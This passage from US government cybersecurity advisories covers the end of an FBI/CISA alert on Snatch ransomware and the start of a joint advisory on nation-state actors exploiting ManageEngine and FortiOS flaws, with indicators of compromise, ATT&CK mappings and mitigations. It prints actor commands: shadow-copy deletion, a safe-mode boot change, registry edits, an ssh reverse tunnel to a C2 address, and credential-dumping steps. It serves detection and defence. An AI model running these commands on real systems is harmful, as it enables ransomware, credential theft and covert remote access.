TTPs to discover data, move laterally, and search for data to exfiltrate. Snatch threat actors use sc.exe to configure, query, stop, start, delete, and add system services using the Windows Command line. In addition to sc.exe, Snatch threat actors also use tools such as Metasploit and Cobalt Strike [S0154]. Prior to deploying the ransomware, Snatch threat actors were observed spending up to three months on a victim’s system. Within this timeframe, Snatch threat actors exploited the victim’s network [T1590], moving laterally across the victim’s network with RDP [T1021.001] for the largest possible deployment of ransomware and searching for files and folders [T1005] for data exfiltration [TA0010] followed by file encryption [T1486]. Defense Evasion and Execution During the early stages of ransomware deployment, Snatch threat actors attempt to disable antivirus software [T1562.001] and run an executable as a file named safe.exe or some variation thereof. In recent victims, the ransomware executable’s name consisted of a string of hexadecimal characters which match the SHA-256 hash of the file in an effort to defeat rule-based detection [T1036]. Upon initiation, the Snatch ransomware payload queries and modifies registry keys [T1012][T1112], uses various native Windows tools to enumerate the system [T1569.002], finds processes [T1057], and creates benign processes to execute Windows batch (.bat) files [T1059.003]. In some instances, the program attempts to remove all the volume shadow copies from a system [T1490]. After the execution of the batch files, the executable removes the batch files from the victim’s filesystem [T1070.004]. The Snatch ransomware executable appends a series of hexadecimal characters to each file and folder name it encrypts—unique to each infection—and leaves behind a text file titled HOW TO RESTORE YOUR FILES.TXT in each folder. Snatch threat actors communicate with their victims through email and the Tox communication platform based on identifiers left in ransom notes or through their extortion blog. Since November 2021, some victims reported receiving a spoofed call from an unknown female who claimed association with Snatch and directed them to the group’s extortion site. In some instances, Snatch victims had a different ransomware variant deployed on their systems, but received a ransom note from Snatch threat actors. As a result, the victims’ data is posted on the ransomware blog involving the different ransomware variant and on the Snatch threat actors’ extortion blog. Indicators of Compromise (IOCs) The Snatch IOCs detailed in this section were obtained through FBI investigations from September 2022 through June 2023. Email Domains and Addresses Since 2019, Snatch threat actors have used numerous email addresses to email victims. Email addresses used by Snatch threat actors are random but usually originate from one of the following domains listed in Tables 1 and 2: Table 1: Malicious Email Domains Observed in Use by Snatch Threat Actors Email Domains sezname[.]cz cock[.]li airmail[.]cc Table 2 shows a list of legitimate email domains offering encrypted email services that have been used by Snatch threat actors. These email domains are all publicly available and legal. The use of these email domains by a threat actor should not be attributed to the email domains, absent specific articulable facts tending to show they are used at the direction or under the control of a threat actor. Table 2: Legitimate Email Domains Observed in Use by Snatch Threat Actors Email Domains tutanota[.]com / tutamail[.]com / tuta[.]io mail[.]fr keemail[.]me protonmail[.]com / proton[.]me swisscows[.]email The email addresses listed in Table 3 were reported by recent victims. Table 3: Snatch’s Email Addresses Reported by Recent Victims Email Addresses sn.tchnews.top@protonmail[.]me funny385@swisscows[.]email funny385@proton[.]me russellrspeck@seznam[.]cz russellrspeck@protonmail[.]com Mailz13MoraleS@proton[.]me datasto100@tutanota[.]com snatch.vip@protonmail[.]com TOX Messaging IDs TOX Messaging IDs CAB3D74D1DADE95B52928E4D9DFC003FF5ADB2E082F59377D049A91952E8BB3B419DB2FA9D3F 7229828E766B9058D329B2B4BC0EDDD11612CBCCFA4811532CABC76ACF703074E0D1501F8418 83E6E3CFEC0E4C8E7F7B6E01F6E86CF70AE8D4E75A59126A2C52FE9F568B4072CA78EF2B3C97 0FF26770BFAEAD95194506E6970CC1C395B04159038D785DE316F05CE6DE67324C6038727A58 NOTE: According to ransom notes, this is a “Customer service” TOX to reach out to if the original TOX ID does not respond. Folder Creation Folder Creation C:\$SysReset Filenames with Associated SHA-256 Hashes Filenames SHA-256 qesbdksdvnotrjnexutx.bat 0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f eqbglqcngblqnl.bat 1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d safe.exe 5950b4e27554585123d7fca44e83169375c6001201e3bf26e57d079437e70bcd safe.exe 7018240d67fd11847c7f9737eaaae45794b37a5c27ffd02beaacaf6ae13352b3 safe.exe 28e82f28d0b9eb6a53d22983e21a9505ada925ebb61382fabebd76b8c4acff7c safe.exe fc31043b5f079ce88385883668eeebba76a62f77954a960fb03bf46f47dbb066 DefenderControl.exe a201f7f81277e28c0bdd680427b979aee70e42e8a98c67f11e7c83d02f8fe7ae PRETTYOCEANApplicationdrs.bi 6992aaad3c47b938309fc1e6f37179eb51f028536f8afc02e4986312e29220c0 Setup.exe 510e9fa38a08d446189c34fe6125295f410b36f00aceb65e7b4508e9d7c4e1d1 WRSA.exe ed0fd61bf82660a69f5bfe0e66457cfe56d66dd2b310e9e97657c37779aef65d ghnhfglwaplf.bat 2155a029a024a2ffa4eff9108ac15c7db527ca1c8f89ccfd94cc3a70b77cfc57 nllraq.bat 251427c578eaa814f07037fbe6e388b3bc86ed3800d7887c9d24e7b94176e30d ygariiwfenmqteiwcr.bat 3295f5029f9c9549a584fa13bc6c25520b4ff9a4b2feb1d9e935cc9e4e0f0924 bsfyqgqeauegwyfvtp.bat 6c9d8c577dddf9cc480f330617e263a6ee4461651b4dec1f7215bda77df911e7 rgibdcghzwpk.bat 84e1476c6b21531de62bbac67e52ab2ac14aa7a30f504ecf33e6b62aa33d1fe5 pxyicmajjlqrtgcnhi.bat a80c7fe1f88cf24ad4c55910a9f2189f1eedad25d7d0fd53dbfe6bdd68912a84 evhgpp.bat b998a8c15cc19c8c31c89b30f692a40b14d7a6c09233eb976c07f19a84eccb40 eqbglqcngblqnl.bat 1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d qesbdksdvnotrjnexutx.bat 0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f HOW TO RESTORE YOUR FILES.TXT   Filenames with Associated SHA-1 Hashes Filenames SHA-1 safe.exe c8a0060290715f266c89a21480fed08133ea2614 Commands Used by Snatch Threat Actors Commands wmiadap.exe /F /T /R %windir%\System32\svchost.eve –k WerSvcGroup conhost.exe 0xFFFFFFFF -ForceV1 vssadmin delete shadows /all /quiet bcdedit.exe /set {current} safeboot minimal REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\VSS /VE /T REG_SZ /F /D Service REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mXoRpcSsx /VE /T REG_SZ /F /D Service REG QUERY HKLM\SYSTEM\CurrentControlSet\Control /v SystemStartOptions %CONHOST% "1088015358-1778111623-1306428145949291561678876491840500802412316031-33820320 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --no-startup-window /prefetch:5 cmd /d /c cmd /d /c cmd /d /c start " " C:\Users\grade1\AppData\Local\PRETTYOCEANluvApplication\PRETTYOCEANApplicationidf.bi. Registry Keys Registry Keys HKLM\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Servers\D8B548F0-E306-4B2B-BD82-25DAC3208786\FriendlyName HKU\S-1-5-21-4270068108-2931534202-3907561125-1001\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{ED50FC29-B964- 48A9-AFB3-15EBB9B97F36} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF System Log Changes Source Message TerminalServices-RemoteConnectionManager Remote session from client name exceeded the maximum allowed failed logon attempts. The session was forcibly terminated. Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall A rule was added (Event 2004) or modified (Event 2005) in the Windows Defender Firewall exception list. All rules included action “Allow” and rule name included “File and Printer Sharing” Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall A Windows Defender Firewall setting was changed in private, public, and domain profile with type “Enable Windows Defender Firewall” and value of “no”. Microsoft-Windows-TaskScheduler%4Operational Instance of process C:\Windows\svchost.exe. (Incorrect file location, should be C:\Windows\System32\svchost.exe) Mutexes Created Mutexes Created \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key gcc-shmem-tdm2-fc_key gcc-hmem-tdm2-sjlj_once gcc-shmem-tdm2-use_fc_key MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 4-16 for all referenced threat actor tactics and techniques in this advisory. Table 4: Snatch Threat Actors ATT&CK Techniques for Enterprise – Reconnaissance Technique Title ID Use Gather Victim Network Information T1590 Snatch threat actors may gather information about the victim's networks that can be used during targeting. Table 5: Snatch Threat Actors ATT&CK Techniques for Enterprise – Resource Development Technique Title ID Use Acquire Infrastructure: Virtual Private Server T1583.003 Snatch threat actors may rent Virtual Private Servers (VPSs) that can be used during targeting. Snatch threat actors acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure. Table 6: Snatch Threat Actors ATT&CK Techniques for Enterprise – Initial Access Technique Title ID Use Valid Accounts T1078 Snatch threat actors use compromised user credentials from criminal forums/marketplaces to gain access and maintain persistence on a victim’s network. External Remote Services T1133 Snatch threat actors exploit weaknesses in RDP to perform brute forcing and gain administrator credentials for a victim’s network. Snatch threat actors use VPN services to connect to a victim’s network. Table 7: Snatch Threat Actors ATT&CK Techniques for Enterprise – Execution Technique Title ID Use Command and Scripting Interpreter: Windows Command Shell T1059.003 Snatch threat actors may use batch files (.bat) during ransomware execution and data discovery. System Services: Service Execution T1569.002 Snatch threat actors may leverage various Windows tools to enumerate systems on the victim’s network. Snatch ransomware used sc.exe. Table 8: Snatch Threat Actors ATT&CK Techniques for Enterprise – Persistence Technique Title ID Use Valid Accounts: Domain Accounts T1078.002 Snatch threat actors compromise domain accounts to maintain persistence on a victim’s network. Table 9: Snatch Threat Actors ATT&CK Techniques for Enterprise – Defense Evasion Technique Title ID Use Masquerading T1036 Snatch threat actors have the ransomware executable match the SHA-256 hash of a legitimate file to avoid rule-based detection. Indicator Removal: File Deletion T1070.004 Snatch threat actors delete batch files from a victim’s filesystem once execution is complete. Modify Registry T1112 Snatch threat actors modify Windows Registry keys to aid in persistence and execution. Impair Defenses: Disable or Modify Tools T1562.001 Snatch threat actors have attempted to disable a system’s antivirus program to enable persistence and ransomware execution. Impair Defenses: Safe Mode Boot T1562.009 Snatch threat actors abuse Windows Safe Mode to circumvent detection by antivirus or endpoint protection and encrypt files when few services are running. Table 10: Snatch Threat Actors ATT&CK Techniques for Enterprise – Credential Access Technique Title ID Use Brute Force: Password Guessing T1110.001 Snatch threat actors use brute force to obtain administrator credentials for a victim’s network. Table 11: Snatch Threat Actors ATT&CK Techniques for Enterprise – Discovery Technique Title ID Use Query Registry T1012 Snatch threat actors may interact with the Windows Registry to gather information about the system, configuration, and installed software. Process Discovery T1057 Snatch threat actors search for information about running processes on a system. Table 12: Snatch Threat Actors ATT&CK Techniques for Enterprise – Lateral Movement Technique Title ID Use Remote Services: Remote Desktop Protocol T1021.001 Snatch threat actors may use Valid Accounts to log into a computer using the Remote Desktop Protocol. Table 13: Snatch Threat Actors ATT&CK Techniques for Enterprise – Collection Technique Title ID Use Data from Local System T1005 Snatch threat actors search systems to find files and folders of interest prior to exfiltration. Table 14: Snatch Threat Actors ATT&CK Techniques for Enterprise – Command and Control Technique Title ID Use Application Layer Protocols: Web Protocols T1071.001 Snatch threat actors establish connections over port 443 to blend C2 traffic in with other web traffic. Table 15: Snatch Threat Actors ATT&CK Techniques for Enterprise – Exfiltration Technique Title ID Use Exfiltration TA0010 Snatch threat actors use exfiltration techniques to steal data from a victim’s network. Table 16: Snatch Threat Actors ATT&CK Techniques for Enterprise – Impact Technique Title ID Use Data Encrypted for Impact T1486 Snatch threat actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. Inhibit System Recovery T1490 Snatch threat actors delete all volume shadow copies from a victim’s filesystem to inhibit system recovery. MITIGATIONS These mitigations apply to all stakeholders. The authoring agencies recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices for hardening software against ransomware attacks (e.g., to prevent threat actors from using Safe Mode to evade detection and file encryption), thus strengthening the secure posture for their customers. For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide. The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Snatch threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Reduce threat of malicious actors using remote access tools by: Auditing remote access tools on your network to identify currently used and/or authorized software. Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable [CPG 2.T]. Using security software to detect instances of remote access software being loaded only in memory. Requiring authorized remote access solutions to be used only from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs). Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter. Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation. Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]: Audit the network for systems using RDP. Close unused RDP ports. Enforce account lockouts after a specified number of attempts. Apply phishing-resistant multifactor authentication (MFA). Log RDP login attempts. Disable command-line and scripting activities and permissions [CPG 2.N]. Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 4.C]. Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E]. Reduce the threat of credential compromise via the following: Place domain admin accounts in the protected users’ group to prevent caching of password hashes locally. Refrain from storing plaintext credentials in scripts. Implement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E]. In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R]. Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST's standards for developing and managing password policies. Use longer passwords consisting of at least eight characters and no more than 64 characters in length [CPG 2.B]. Store passwords in hashed format using industry-recognized password managers. Add password user “salts” to shared login credentials. Avoid reusing passwords [CPG 2.C]. Implement multiple failed login attempt account lockouts [CPG 2.G]. Disable password “hints.” Refrain from requiring password changes more frequently than once per year.Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher. Require administrator credentials to install software. Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H]. Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F]. Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A]. Install, regularly update, and enable real time detection for antivirus software on all hosts. Disable unused ports and protocols [CPG 2.V]. Consider adding an email banner to emails received from outside your organization [CPG 2.M]. Disable hyperlinks in received emails. Ensure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R]. VALIDATE SECURITY CONTROLS In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Tables 4-16). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. RESOURCES Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts. Resource to mitigate a ransomware attack: #StopRansomware Guide. No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment. REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from IP addresses, a sample ransom note, communications with Snatch threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or to CISA at report@cisa.gov or (888) 282-0870. REFERENCES [1] DataBreaches.net DISCLAIMER The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA. VERSION HISTORY September 20, 2023: Initial version.

SUMMARY The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application. Additional APT actors were also observed exploiting CVE-2022-42475 to establish presence on the organization’s firewall device. CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation. Download the PDF version of this report: AA23-250A Actors Exploit CVE-2022-47966 and CVE-2022-42475 (PDF, 681.49 KB ) For a downloadable copy of IOCs, see: AA23-250A STIX XML (XML, 69.24 KB ) AA23-250A STIX JSON (JSON, 69.89 KB ) For a downloadable copy of the Malware Analysis Report (MAR) accompanying this CSA, see: MAR-10430311-1.v1 Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475 (PDF, 385.49 KB ) Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See Tables 3-13 for the APT actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations. Overview By request of the impacted organization, CISA conducted an incident response engagement from February to April 2023. CISA and co-sealers assess that beginning as early as January 2023, multiple nation-state APT actors were present on the organization’s network via at least two initial access vectors: Initial Access Vector 1: APT actors exploited CVE-2022-47966 to access the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus. Initial Access Vector 2: APT actors exploited CVE-2022-42475 to access the organization’s firewall device. CISA and co-sealers identified an array of threat actor activity, to include overlapping TTPs across multiple APT actors. Per the activity conducted, APT actors often scan internet-facing devices for vulnerabilities that can be easily exploited. Firewall, virtual private networks (VPNs), and other edge network infrastructure continue to be of interest to malicious cyber actors. When targeted, they can be leveraged to expand targeted network access, serve as malicious infrastructure, or a mixture of both. APT Actor Activity Initial Access Vector 1 As early as January 2023, APT actors exploited CVE-2022-47966 [T1190] for initial access to the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus. CISA observed indications in log files that a connection to the known malicious IP address 192.142.226[.]153 was made as part of initial exploitation. Through exploitation of CVE-2022-47966, APT actors achieved root level access on the web server and created a local user account [T1136.001] named Azure with administrative privileges [T1068]. Actors were further able to download malware, enumerate the network, collect administrative user credentials, and move laterally through the organization’s network. CISA and co-sealers were unable to determine if proprietary information was accessed, altered, or exfiltrated. This was due to the organization not clearly defining where their data was centrally located and CISA having limited network sensor coverage. Initial Access Vector 2 Additional APT actors exploited CVE-2022-42475 on the organization’s firewall device, which was indicated by multiple successful VPN connections from known-malicious IPs between February 1-16, 2023. It was identified that APT actors compromised and used disabled, legitimate administrative account credentials [T1078.003] from a previously hired contractor—of which the organization confirmed the user had been disabled prior to the observed activity. Analysis identified that a common behavior for these threat actors was to use disabled administrative account credentials and delete logs from several critical servers in the environment [T1070.001]. This prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers were also unable to further track the activity due to the organization not having Network Address Translation (NAT) IP logging enabled. APT actors initiated multiple Transport Layer Security (TLS)-encrypted sessions [T1573.002] on Transmission Control Protocol (TCP) port 10443 [T1571], indicating successful exchanges of data transfer from the firewall device. APT actors were observed connecting to the device from the following actor-controlled C2 IP addresses: 144.202.2[.]71 207.246.105[.]240 45.77.121[.]232 47.90.240[.]218 APT actors further leveraged legitimate credentials to move from the firewall to a web server, where multiple web shells were loaded—among other locations, such as the OWA server—into the following directories. Note: The following file paths to these web shells were received in coordination with a trusted third-party; however, the artifacts were not received for analysis. c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\resource.aspx c:\inetpub\wwwroot\[REDACTED]\css\font-awesome\css\discover.ashx c:\inetpub\wwwroot\[REDACTED]\css\font-awesome\css\configlogin.ashx c:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\template\layouts\approveinfo.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\errorinfo.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.ashx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\error.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\infos.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info-1.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\new_list.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\errorinfo.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\lgnbotr.ashx c:\inetpub\passwordchange\0LECPNJYRH.aspx c:\inetpub\passwordchange\9ehj.aspx c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\servicesinfo.ashx c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\services.aspx c:\inetpub\redirectedSites\[REDACTED]\products\uns1fw.aspx c:\inetpub\redirectedSites\[REDACTED]\products\uns1ew.aspx The following IP addresses were identified as associated with the loaded web shells: 45.90.123[.]194 154.6.91[.]26 154.6.93[.]22 154.6.93[.]5 154.6.93[.]12 154.6.93[.]32 154.6.93[.]24 184.170.241[.]27 191.96.106[.]40 102.129.145[.]232 Forensic Timeline of APT Actor Activity Tables 1 and 2 list the timeline of events discovered during the incident response, as well as tools used by the APT actors to conduct their operations, respectively. All timestamps are presented in Coordinated Universal Time (UTC). Table 1: Timeline of APT Actor Activity Timestamp (UTC) Event Description 2023-01-18 11:57:02 Hello World User-Agent string observed in 44 total events. Uniform Resource Identifier (URI): /cgi-bin/downloadFlile[.]cgi Hello World, the User-Agent string inside of the initiated HTTP request, was observed during communication between the organization’s web server and malicious command and control (C2) server IP 92.118.39[.]82 [T1071.001]. This string has been observed in open source as an initial step of the Mirai botnet to download malicious artifacts [T1583.005].[1] 2023-01-20 Attempts made to export three files; associated with malicious IP 192.142.226[.]153. APT actors attempted to export [TA0009], [TA0010] three files, which were analyzed and identified as Local Security Authority Subsystem Service (LSASS) dump files. These files were renamed with .zip and .gif extensions to evade detection [T1036.008]. Analysis confirmed the APT actors were unsuccessful at exfiltrating these files: wo_view_bg.zip (09:06:37 UTC)\ wo_view_bg1.gif (09:08:11 UTC) wo_view_bg2.gif (09:19:43 UTC) Note: If local administrative access is achieved on a victim host, dumping LSASS credentials may allow for lateral movement across the environment. This behavior was identified during the engagement and is detailed throughout Table 1. 2023-01-20 16:51:05 Successful web server exploitation via CVE-2022-47966. Successful web server (Zoho ManageEngine ServiceDesk Plus) exploitation via CVE-2022-47966. 2023-01-21 06:46:42 Azure local user account with administrative permissions created. A local user account with administrative permissions, named Azure, was created on the server hosting ServiceDesk Plus. 2023-01-21 06:49:40 LSASS dumped by Azure user. The Azure user successfully accessed and dumped credentials stored in the process memory of LSASS for the Active Directory (AD) domain [T1003.001]. Note: Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. 2023-01-21 06:50:59 Mimikatz.exe downloaded via ConnectWise ScreenConnect. The legitimate ConnectWise ScreenConnect client was utilized to connect to the ServiceDesk system, download mimikatz.exe, and execute malicious payloads to steal credentials [T1219], [T1588.002]. Note: ConnectWise ScreenConnect was observed in multiple locations within the organization’s environment, but the organization confirmed that it was not authorized software. Analysis assessed APT actors downloaded the legitimate software for malicious, illegitimate use prior to the download of mimikatz.exe. 2023-01-21 07:34:32 Bitmap.exe malware downloaded and designated to connect to C2 IP 179.60.147[.]4. Azure user account downloaded bitmap.exe to the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server [T1027.009]. This malware is identified as a variant of Metasploit (Meterpreter). See MAR-10430311-1.v1 for additional details. 2023-01-21 08:46:23 Mimikatz credential dump files created. Two files (c:\windows\system32\fuu.txt, c:\windows\system32\jojo.txt) were created as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system [T1003]. 2023-01-21 09:25:58 Legitimate files/applications nmap.exe and npcap.exe downloaded. Azure user account downloaded nmap.exe [T1018] and npcap.exe [T1040] to continue network and credential information gathering efforts. Though legitimate applications, APT actors used these files for illegitimate, malicious purposes. Note: Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure. 2023-01-21 13:56:14 ssh2.zip downloaded by the Azure user account. APT actors downloaded the file ssh2.zip via the Azure user account, which contained legitimate files that could have been leveraged for malicious purposes. When unzipped, the following files were extracted: install-sshd.ps1 (script) psexec.exe sshd.exe ssh.exe ssh-sk-helper.exe libcrypto.dll Note: CISA analyzed these files and did not identify the files as malicious. However, ssh.exe was downloaded to establish persistence on the ServiceDesk system via SSH [T1133] and is detailed in the scheduled task below. 2023-01-21 14:02:45 Ngrok token created, renamed to ngrok.yml config file, and Remote Desktop Protocol (RDP) connection established. Ngrok was used to establish an RDP connection [T1021.001]—another method of maintaining persistence on the ServiceDesk system. In this instance, Ngrok was used to establish a reverse proxy connection to the ServiceDesk system. At the time of analysis, the firewall access control lists (ACLs) allowed all outbound connections. Considering APT actors utilized an outbound proxy, the RDP session was successfully established as the connection was initiated from the ServiceDesk system. Note: RDP is a common feature in operating systems, which allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. 2023-01-21 14:31:01 SSH tools downloaded to establish reverse (remote) communication. Three identified executables, which provide a command line interface with the compromised system, were observed in the following file system locations: c:\windows\system32\ssh-shellhost.exe c:\windows\system32\ssh-agent.exe c:\windows\system32\ssh-add.exe While the files were not identified as malicious, they were loaded for malicious purposes. 2023-01-21 14:33:11 license validf scheduled task created to communicate with malicious IP 104.238.234[.]145. license validf scheduled task [T1036.004] was created to execute ssh.exe on a recurring basis on the ServiceDesk system [T1053.005]: c:\Windows\System32\ssh.exe -N -f -R 12100 sst@104.238.234.145 -p 443 -o StrictHostKeyChecking=no Analysis identified ssh.exe was used to establish a SSH reverse tunnel to the APT actors’ C2 with dynamic port forwarding [T1572]. This allowed the actors to send traffic from their C2 server into the environment and connect directly to other systems and resources. 2023-01-21 14:51:49 PsExec executed on the ServiceDesk system. Analysis identified evidence and execution of two files (PsExec.exe and psexec.exe) on the ServiceDesk system. These files were determined to be benign. APT actors utilized PsExec to create a scheduled task and force-store administrative credentials to the local machine. psexec.exe -i -s C:\Windows\System32\mmc.exe /s C:\Windows\System32\taskschd.msc powershell New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force Note: PsExec, a command line utility from Microsoft's Sysinternals Suite, is known to be used for lateral movement; evidence of lateral movement via PsExec has not been confirmed. 2023-01-21 14:55:02 ProcDump created on the ServiceDesk system. ProcDump was created within the c:\windows\system32\prc64.exe directory. This was later identified as a method for enumerating running processes/applications [T1057] and dumping LSASS credentials. 2023-01-24 15:07:18 Apache Log4j exploit attempted against the ServiceDesk system. APT actors attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful. The two IPs and one domain associated with this exploitation attempt are: 80.85.241[.]15 68.177.56[.]38 main.cloudfronts[.]net 2023-01-25 00:17:33 Mimikatz credential dump files created. One file (c:\ManageEngine\ServiceDesk\bin\1.txt) was created as a method for Mimikatz to dump/write credentials to disk on the ServiceDesk system. Note: This is a different path and time associated with Mimikatz than listed above. 2023-01-29 HTTP-GET requests sent to C2 IP 92.118.39[.]82. The server hosting ServiceDesk was observed beaconing/sending HTTP-GET requests to a suspected APT-controlled C2 server, indicating malware was successfully implanted. 2023-02-02 05:51:08 Resource.aspx web shell detected. Using additionally compromised, legitimate administrative credentials, APT actors logged into the Outlook Web Application (OWA) server from the 